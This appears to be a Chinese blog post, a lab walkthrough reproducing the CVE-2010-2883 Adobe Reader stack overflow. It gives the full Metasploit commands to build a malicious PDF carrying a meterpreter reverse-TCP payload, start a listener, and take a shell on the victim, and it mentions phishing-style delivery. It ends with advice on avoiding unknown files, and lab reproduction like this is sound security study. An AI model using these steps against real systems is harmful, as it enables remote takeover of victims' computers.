[漏洞复现]CVE-2010-2883 Adobe Reader 打开pdf电脑即刻中招

一、漏洞概述:linux

CVE-2010-2883漏洞原理:“Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可容许任意代码远程执行。”shell

影响版本:Adobe Reader 8.2.4 - 9.3.4windows

 

二、实验环境微信

攻击机:kali linux 2017session

靶机:win 7 + Adobe Reader 9.3tcp

 

三、实验工具:工具

连接: https://pan.baidu.com/s/1sQOxcGlb8r095e1oCBipPg 密码: 5fta字体

 

四、漏洞复现spa

在win 7 安装好Adobe Reader 9.3 3d

 

 进入kali,使用Metasploit生成PDF木马文件

打开msf root@kali:~# msfconsole 搜索Adobe渗透模块 msf > search adobe_cooltype_sing 调用渗透模块 msf > use exploit/windows/fileformat/adobe_cooltype_sing 查看模块详情 msf exploit(adobe_cooltype_sing) > info

 

调用攻击载荷,反向链接到攻击机 msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp 设置kali 的IP地址 msf exploit(adobe_cooltype_sing) > set LHOST 192.168.190.130 设置本地监听端口 msf exploit(adobe_cooltype_sing) > set LPORT 8888 设置带有后门程序的PDF文件 msf exploit(adobe_cooltype_sing) > set FILENAME GeekFZ.pdf 执行渗透生成文件 msf exploit(adobe_cooltype_sing) > exploit

 

 将PDF木马文件拷贝到kali linux的桌面

root@kali:~# cp /root/.msf4/local/GeekFZ.pdf /root/桌面/GeekFZ.pdf

 

 Metasploit开启shell监听会话,等待肉鸡上线

返回 msf exploit(adobe_cooltype_sing) > back 使用handler模块 msf > use exploit/multi/handler 回弹一个tcp链接 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 设置监听IP地址(跟PDF木马文件同样,即kali的IP) msf exploit(handler) > set LHOST 192.168.190.130 设置监听的端口(跟PDF木马文件同样) msf exploit(handler) > set LPORT 8888 开启监听 msf exploit(handler) > exploit

 

将PDF木马文件拷贝到win 7并打开

 

 kali成功获取shell

 

 到session中链接它,并用Meterpreter控制肉鸡

查看sessions msf exploit(handler) > sessions 链接session msf exploit(handler) > sessions -i 2

 

注:考虑到这个漏洞利用过程,adobe reader会“卡壳”退出,因此须要快速切换到其余系统进程,这样会话才不会丢失。 

获取进程 meterpreter > ps 切换进程 meterpreter > migrate 3688

 

获取Dos shell meterpreter > shell

 

 

实验总结:


能够看到,最终因为Adobe Reader 存在CVE-2010-2883这个高危漏洞,致使电脑打开特殊定制的pdf以后,直接变成肉鸡。与以前文章中的Office和Flash 0day漏洞相似,真实环境下,不少黑客会利用此方法,结合社会工程学,例如经过诱导邮件、各类论坛、QQ群、微信群等多渠道,诱导用户下载并打开,而只要打开的用户,就直接中招。

 

在这里也呼吁你们:日常要很是当心陌生办公文件,不管是pdf仍是word等,打开以前必定要明确来源,或者用杀毒软件先杀毒,再打开。另外,就是尽可能保证电脑的软件处于最新版,这样才能最大程度下降被攻击的概率。

相关文章
相关标签/搜索